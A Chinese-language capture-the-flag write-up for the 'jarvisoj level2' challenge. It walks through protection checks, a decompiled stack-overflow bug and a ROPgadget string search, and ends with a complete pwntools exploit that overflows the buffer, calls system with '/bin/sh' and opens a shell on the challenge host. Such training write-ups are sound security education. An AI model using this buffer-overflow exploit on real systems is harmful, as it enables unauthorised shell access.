jarvisoj level2
# jarvisoj level2
# 前提
# 查看文件保护
[*] '/root/pwn/buuctf/jarvisoj_level2/level2'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x8048000)
1
2
3
4
5
6
2
3
4
5
6
# 静态分析
主函数如下
int __cdecl main(int argc, const char **argv, const char **envp)
{
vulnerable_function();
system("echo 'Hello World!'");
return 0;
}
1
2
3
4
5
6
2
3
4
5
6
漏洞函数vulnerable_function如下
ssize_t vulnerable_function()
{
char buf; // [esp+0h] [ebp-88h]
system("echo Input:");
return read(0, &buf, 0x100u);
}
1
2
3
4
5
6
7
2
3
4
5
6
7
函数表存在system函数
Gadget
ROPgadget --binary level2 --string "/bin/sh\x00"
Strings information
============================================================
0x0804a024 : /bin/sh
1
2
3
4
2
3
4
# 思路分析
- 目前信息:
vulnerable_function函数可溢出plt表内有system- 程序内有
/bin/sh字符串 - No PIE
- 思路
- 直接溢出到
plt表内的system处,传入/bin/sh地址即可
# exp
from pwn import *
context(os='linux', arch='i386', log_level='debug')
pwnfile = '/root/pwn/buuctf/jarvisoj_level2/level2'
# io = process(pwnfile)
io = remote('node4.buuoj.cn', 29484)
elf = ELF(pwnfile)
padding = 0x88+4
bin_sh = 0x0804A024
payload = flat(['a'*padding, elf.plt['system'], 0xdeadbeef, bin_sh])
io.recv()
io.sendline(payload)
io.interactive()
1
2
3
4
5
6
7
8
9
10
11
12
2
3
4
5
6
7
8
9
10
11
12
上次更新: 2022/08/15, 00:29:49